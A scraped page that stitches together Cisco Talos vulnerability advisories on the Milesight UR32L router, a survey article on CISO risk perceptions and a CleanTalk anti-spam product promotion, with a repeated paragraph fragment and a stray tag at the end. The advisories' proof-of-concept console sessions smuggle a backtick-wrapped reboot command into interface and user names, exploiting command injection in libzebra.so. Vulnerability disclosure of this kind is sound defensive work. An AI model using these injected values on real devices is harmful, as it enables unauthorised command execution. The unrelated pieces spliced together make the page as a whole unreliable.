    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable 
    ROUTER# configure terminal         
    ROUTER(config)# user_permission 
    ROUTER(user-permission)# user `reboot` name test
    the user `reboot` is not exist!
    ROUTER(user-permission)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device rebooting.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-22365: TALOS-2023-1711 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the libzebra.so bridge_group functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the libzebra.so bridge\_group functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-77 - Improper Neutralization of Special Elements used in a Command (‘Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the router console. This is an interactive shell to modify the router settings.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities. The number of functionalities depends on the user privileges. Indeed, the admin user can access the enable command, which will allow access to a high privilege command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

Issuing the configure terminal command permits access to the interface <interface_name> command that configures a network interface. Several configuration are available for the interfaces; one of them is the command bridge-group <1-10> that is used to add the interface to a bridge.

An example of using this functionality follows:

    ROUTER> enable 
    ROUTER# configure terminal 
    ROUTER(config)# interface eth4
    ROUTER(config-if)# bridge-group 2
    

This will add eth4 to the bridge number 2. The function responsible for managing the bridge-group command is the libzebra.so.0.0.0’s bridge_group function:

    void bridge_group(undefined4 param_1,interface_struct *interface_struct,undefined4 param_3,
                     char **argv)
    
    {
     [... variable declaration ...]
    
      puVar6 = (undefined4 *)0x0;
      local_2c = __stack_chk_guard;
      interface_name = interface_struct->interface_name;                                                            [1]
      bridge_group_n = atoi(*argv);
      piVar5 = (int *)0x0;
      memset(ifconfig_command,0,0x40);
      snprintf(ifconfig_command,0x40,"ifconfig %s 0.0.0.0",interface_name);                                         [2]
      system(ifconfig_command);                                                                                     [3]
      [...]
    }
    

At [1], the <interface_name> provided is fetched (in the example above, it is eth4). At [2] the ifconfig <interface_name> 0.0.0.0 string is composed and then used as argument of the system function at [3]. Because the <interface_name> is eventually used in the system function, the bridge_group is vulnerable to a command injection vulnerability.

**Exploit Proof of Concept**

Following a POC triggering a reboot of the system through the command injection exposes above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable 
    ROUTER# configure terminal 
    ROUTER(config)# interface `reboot`
    ROUTER(config-if)# bridge-group 2
    bridge.c:366 bridge_group: use command 'bridge <1-10>' to creates a new ethernet bridge!
    ROUTER(config-if)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device rebooting.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-22306: TALOS-2023-1698 || Cisco Talos Intelligence Group

C-suite security leaders are feeling less prepared to cope with cyberattacks and more at risk than last year.

With the chaos of the pandemic now in the rearview mirror, we are finally back to "business as usual." The return to normal operations may imply that chief information security officers (CISOs) can now breathe easier, but the opposite is true. CISOs are feeling less prepared to cope with cyberattacks and more at risk than last year, indicating a reversal from the early days of the pandemic, new research shows.

The "2023 Voice of the CISO" report, Proofpoint's global survey of 1,600 CISOs, found that 68% of respondents feel at risk of experiencing a material cyberattack in the next 12 months. This is a sharp decrease from last year's 48% and a shift back to 2021 levels, when 64% felt at risk. The report also found that 61% of surveyed security leaders believe their organization is unprepared to cope with a targeted cyberattack, compared with 50% in 2022 and 66% in 2021.

**Reasons for CISOs' Elevated Concerns**

The tumultuous cybersecurity events of 2022 may be one reason behind the CISOs' return to an elevated concern. Last year saw increasingly devastating ransomware attacks that shuttered organizations and crippled entire nations. At the same time, geopolitical tensions continued to mount with incidents such as Russia's attacks on US airports and Chinese nation-state actors' targeting telecoms. The shaky economy did not help matters, and 58% of surveyed CISOs shared that the downturn has affected their security budgets negatively. All these events put security leaders on edge, perhaps lowering their confidence in their security posture.

Another explanation for CISOs' elevated concern may be the anomaly of the pandemic. Having conquered the unprecedented challenges caused by the overnight move to remote operations, security leaders felt a sense of calm. Although attack volumes did not abate, CISOs had a brief period of reprieve as they felt their organizations were less at risk. Yet the ability to secure their remote environments may have given CISOs a false sense of confidence. With the return to normal operations, the post-pandemic security metrics likely looked less reassuring, and the optimism wore off.

**Growing Pressures Make the CISO's Job Unsustainable**

Whatever the reason behind CISOs' recalibration of perceptions, their diminished confidence is exacerbated by new concerns about personal liability raised by last year's blockbuster Uber case, which resulted in probation for the company's former chief security officer. The US federal court ruling has deep implications that may set a dangerous precedent, and 62% of CISOs surveyed by Proofpoint agreed that they are concerned about personal liability.

The survey also revealed that 60% of CISOs have experienced burnout in the past 12 months, while 61% feel their job expectations are unreasonable, which is a big jump from the previous year's 49%. When we add these mounting pressures to ongoing struggles such as the cybersecurity talent shortage and new issues such as the recent wave of layoffs, it is not surprising that the CISO's role is becoming unsustainable.

This is a time when CISOs need champions on their board of directors more than ever. The Proofpoint report gives a glimmer of hope in this regard, showing a thawing CISO-board relationship — 62% of CISOs say they see eye-to-eye with their board on cybersecurity issues. This trend has been on an upward trajectory in the past three years.

**Protecting Data a Top Priority — and a Big Challenge**

The Voice of the CISO report shows that data protection remains a top-of-mind priority for CISOs. The ripple effect of the Great Resignation and employee turnover exacerbate the problem of data loss — 63% of surveyed security leaders reported dealing with a material loss of sensitive data in the past 12 months, and 82% said that employees leaving the organization contributed to this loss. Layoffs, like the massive ones we've seen in the technology sector, could especially be an issue because employees may feel wronged and justified in taking corporate data with them on the way out.

Despite the widespread loss of data, 60% of CISOs believe they have adequate controls in place to protect it. This optimism is surprising, especially given CISOs' lack of confidence in their security postures. And we expect that the problem will get worse as the economic uncertainty lingers and more sectors beyond technology — from manufacturing to consulting — pursue mass layoffs.

**Supply Chain All But Secure**

Another area where security leaders are far too optimistic is supply chain security. Nearly two-thirds of CISOs surveyed by Proofpoint said they have appropriate controls for mitigating supply chain risk. However, protecting today's complex and interconnected supply chain is extremely difficult — and a problem the industry has not been able to solve.

Most organizations simply do not have a grasp on third-party risk while relying heavily on a range of partners and suppliers. Threat actors know this well, which is why we have entered a new era of weaponization of trust. As one example, research found an astounding 633% increase in the number of supply chain attacks using malicious components in the past year. That is one of the many reasons supply chain security has become a matter of national security — and part of a new national cyber strategy in the United States.

The good news is that addressing supplier risk is one of the top priorities in the next 12 months among surveyed CISOs. These findings indicate that security leaders realize supply chain security is critical. The question is whether they can continue to devote adequate resources to this area if security budgets hang in the balance.

**Security Risk Is Business Risk**

Added regulatory scrutiny, escalating supply chain attacks, data protection — all these challenges impact investor, consumer, and employee confidence in the enterprise. As trust becomes more important for organizational success, it is important for both CISOs and boards to look at security risk as business risk and understand the implications of systemic risk within their organization. Although solving complex cybersecurity problems requires an industrywide effort, it all starts at the organizational level — and CISOs must lead the conversation.

CISOs Find 'Business as Usual' Shows the Harsh Realities of Cyber-Risk

Every website owner or webmaster grapples with the issue of spam on their website forms. The volume of spam can be so overwhelming that finding useful information within it becomes quite challenging. What exacerbates this issue is that spam can populate your public pages, appearing in comments and reviews. You likely understand how this can damage your website's reputation, affect search results

Every website owner or webmaster grapples with the issue of spam on their website forms. The volume of spam can be so overwhelming that finding useful information within it becomes quite challenging. What exacerbates this issue is that spam can populate your public pages, appearing in comments and reviews. You likely understand how this can damage your website's reputation, affect search results, overload your web server, and divert your focus from website development.

Website owners and webmasters need a solution to this problem. When selecting an anti-spam solution, the following requirements should be taken into account:

1.  The solution must operate automatically, eliminating the need for manual spam checks.
2.  It should provide a quick and efficient method of accuracy control.
3.  It must be universal, protecting all website forms simultaneously.
4.  It should be easy and straightforward to install and set up.
5.  It should not require any extra steps from your visitors, ensuring they do not have to confirm that they are humans, not bots.

**CleanTalk Anti-Spam Solution**

CleanTalk Anti-Spam is a cloud-based tool designed to block various types of spam that website administrators encounter daily. This includes spam in comments, contact forms, signups, registrations, subscriptions, newsletters, and WooCommerce reviews and checkouts.

This solution delivers the following benefits:

*   All spam-related computations and decisions are processed on remote servers, reducing the load on your web servers thanks to cloud technology.
*   The Service Dashboard provides detailed insights into website requests, equipping you with tools to manage service features. It clearly indicates whether a request was spam.
*   The plugin can be installed and set up easily on any website in just a few minutes.
*   With this single solution, all forms on your website are safeguarded.
*   Spam checks are conducted without interrupting your site visitors, requiring no action on their part.

Several important service features require separate mentions:

*   **SpamFireWall** - This feature blocks the most actively spamming bots before they can visit your website.
*   **Email Address Validation** - This function verifies the authenticity of an email address in real time.
*   **Encode Contact Data** - This feature encodes the email addresses displayed on your public pages, protecting them from being parsed by bots.

**Let's go through an example on WordPress**

**1)** To install the plugin: Navigate to your WordPress Dashboard → Click on 'Plugins,' then 'Add New' → In the search field, type 'CleanTalk.'

**2)** Install the plugin and activate it. You will be automatically redirected to the plugin's settings.

**3)** Click on 'Get Access Key Automatically,' then save the settings. At this point, a CleanTalk account will be created for you. The account credentials will be sent to your email.

That's it! Your website now has protection from spam. Any spam attempts will be promptly blocked.

**Testing the Protection on the Contact Form by WPForms as an Example**

To test the form, open the website in a new Incognito tab. This is necessary because the plugin doesn't register actions performed by the admin.

Navigate to the page containing the contact form and enter the test email address \[ s@cleantalk.org \]. Click the "Submit" button to send the data. If the data is blocked, a corresponding message should appear.

The CleanTalk plugin captures the website request made via the contact form and forwards the gathered data to the CleanTalk Cloud for processing. In the Cloud, a decision is made regarding the "Spam/Not Spam" status. This status is then relayed back to the plugin, which either forwards the form data to the website backend or blocks it. This request data gets logged in your Anti-Spam Log within your service Dashboard.

To access your Anti-Spam Log, either go directly to your Dashboard or open the plugin settings and click the "Click here to get the Anti-Spam statistics" button.

**Service Dashboard Features**

The Anti-Spam Log - This tool gives you insight into all website requests processed by the CleanTalk Cloud, including their status and additional details.

Each request includes the following:

*   Status — Denied or Approved
*   Date and time of request
*   Sender's username, IP, and email addresses
*   Spam activity linked to these IP and email addresses
*   Email address validation result — Fake or Real

You can click on "Details" under each request to access complete information.

This feature ensures that you never miss out on any data and allows you to monitor the accuracy of the filtering process. Another notable feature of the CleanTalk plugin is that it captures data even when a visitor makes a typo or fails the built-in form validation, making the data available in your Anti-Spam Log.

The Dashboard also allows you to:

*   Manage your list of protected websites.
*   Update your account settings.
*   View summary statistics.
*   Manage Personal Lists of IPs, Emails, Stop-Words, Countries, and Languages.

These features make our Anti-Spam Service a robust solution for spam protection and shielding your website from unwanted messages or requests.

**Conclusion**

A robust spam filter is essential for your website. CleanTalk Anti-Spam provides a one-week free trial, allowing you to verify its effectiveness in managing spam on your site. The service begins at $12 annually, and unlimited website usage is available for $25 per month. Rather than manually moderating and reviewing your messages, delegate this task to CleanTalk.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#acer